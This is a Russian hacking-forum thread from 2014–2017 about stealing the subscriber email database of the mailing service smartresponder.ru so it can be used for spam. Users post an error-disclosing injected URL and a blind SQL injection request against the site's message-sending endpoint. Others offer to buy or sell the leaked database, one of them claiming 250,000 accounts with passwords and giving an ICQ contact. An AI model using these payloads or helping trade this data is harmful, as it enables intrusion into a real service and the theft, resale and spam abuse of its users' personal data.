PDA

Просмотр полной версии : Угнать базу е-mail со смартреспондера


alarm
17.06.2014, 12:25
Практически все "инфобизнесмены" на своих блогах используют сервис подписок-рассылок smartresponder. Есть ли возможность угнать список e-mail'ов под спам?

psihoz26
17.06.2014, 16:39
Кто заинтересовался есть раскрытие


Code:
http://smartresponder.ru/polls.html?action=2&id='736&voted=1

Warning: Invalid argument supplied for foreach() in /home/smart/www/sys/templates/polls/poll_result.php on line 87
Functions stack:
- /home/smart/www/sys/lib/view.lib.php, line 355 [tmpl_view_result()]
- /home/smart/www/sys/templates/polls/poll_result.php, line 18 [call()]
- /home/smart/www/sys/lib/view.lib.php, line 89 [include_once()]
- /home/smart/www/sys/lib/view.lib.php, line 229 [process_view_php()]
- /home/smart/www/sys/lib/_site/user_view.lib.php, line 66 [echo_view()]
- /home/smart/www/polls.html, line 195 [echo_view()]

dimakin
02.08.2014, 18:36
базу давно уже угнали и продают по неимоверной цене.

admink1
16.09.2014, 01:47
где можно купить/скачать базу?

Munez64
16.09.2014, 09:30
admink1 said:
где можно купить/скачать базу?


у меня: ICQ 655920350

lisvan
16.09.2014, 15:07
База у каждого второго уже есть, ее даже в паблик слили)

Axeee
28.09.2014, 03:47
lisvan said:
База у каждого второго уже есть, ее даже в паблик слили)


скинь линк

mynews3
18.11.2014, 11:42
psihoz26 said:
Кто заинтересовался есть раскрытие

Code:
http://smartresponder.ru/polls.html?action=2&id='736&voted=1

Warning: Invalid argument supplied for foreach() in /home/smart/www/sys/templates/polls/poll_result.php on line 87
Functions stack:
- /home/smart/www/sys/lib/view.lib.php, line 355 [tmpl_view_result()]
- /home/smart/www/sys/templates/polls/poll_result.php, line 18 [call()]
- /home/smart/www/sys/lib/view.lib.php, line 89 [include_once()]
- /home/smart/www/sys/lib/view.lib.php, line 229 [process_view_php()]
- /home/smart/www/sys/lib/_site/user_view.lib.php, line 66 [echo_view()]
- /home/smart/www/polls.html, line 195 [echo_view()]



я не разбираюсь в коде. он нужен для сбора email со смартреспондера ?

Expl0ited
18.11.2014, 11:47
sql inj


Code:
#POST /user/send_message.html HTTP/1.1
#Host: smartresponder.ru
#Content-Type: application/x-www-form-urlencoded; charset=UTF-8
#Cookie: валидные куки

false - #rMessageType=html&action=1&rFromEmail=валидный емейл&rFromName=логин&targetCntSubscribers=0&rSendersMain=on&rSenders[]=delivery&rSendersDelivery[]=536718' and if(false,1,(select 1 union select 2))#&target_cnt=1

true - #rMessageType=html&action=1&rFromEmail=валидный емейл&rFromName=логин&targetCntSubscribers=0&rSendersMain=on&rSenders[]=delivery&rSendersDelivery[]=536718' and if(true,1,(select 1 union select 2))#&target_cnt=1

kcash
18.11.2014, 20:58
зато у меня есть даже с паролями )) у большинства в скринах бабушкины почты )) А если рассказать историю как была угнала - вообще смех! ))

sc0rp
18.11.2014, 21:28
kcash said:
А если рассказать историю как была угнала - вообще смех! ))


руби, настроение хоть поднимешь!

3ran
24.11.2014, 00:22
kcash said:
зато у меня есть даже с паролями )) у большинства в скринах бабушкины почты )) А если рассказать историю как была угнала - вообще смех! ))


Продаешь?)

kcash
08.12.2014, 19:25
3ran said:
Продаешь?)


да могу. пиши лс

kcash
17.05.2015, 18:52
есть база не только реципиентов, но и 250к создателей рассылок.. с пассами.. 250к их

Kroaton
01.11.2015, 09:25
Expl0ited said:
↑ (https://antichat.live/posts/3790528/)
sql inj

Code:
#POST /user/send_message.html HTTP/1.1
#Host: smartresponder.ru
#Content-Type: application/x-www-form-urlencoded; charset=UTF-8
#Cookie: валидные куки

false - #rMessageType=html&action=1&rFromEmail=валидный емейл&rFromName=логин&targetCntSubscribers=0&rSendersMain=on&rSenders[]=delivery&rSendersDelivery[]=536718' and if(false,1,(select 1 union select 2))#&target_cnt=1

true - #rMessageType=html&action=1&rFromEmail=валидный емейл&rFromName=логин&targetCntSubscribers=0&rSendersMain=on&rSenders[]=delivery&rSendersDelivery[]=536718' and if(true,1,(select 1 union select 2))#&target_cnt=1



чем чекали на уязвимость?

Lkdee
28.08.2017, 03:41
у меня где то эта база есть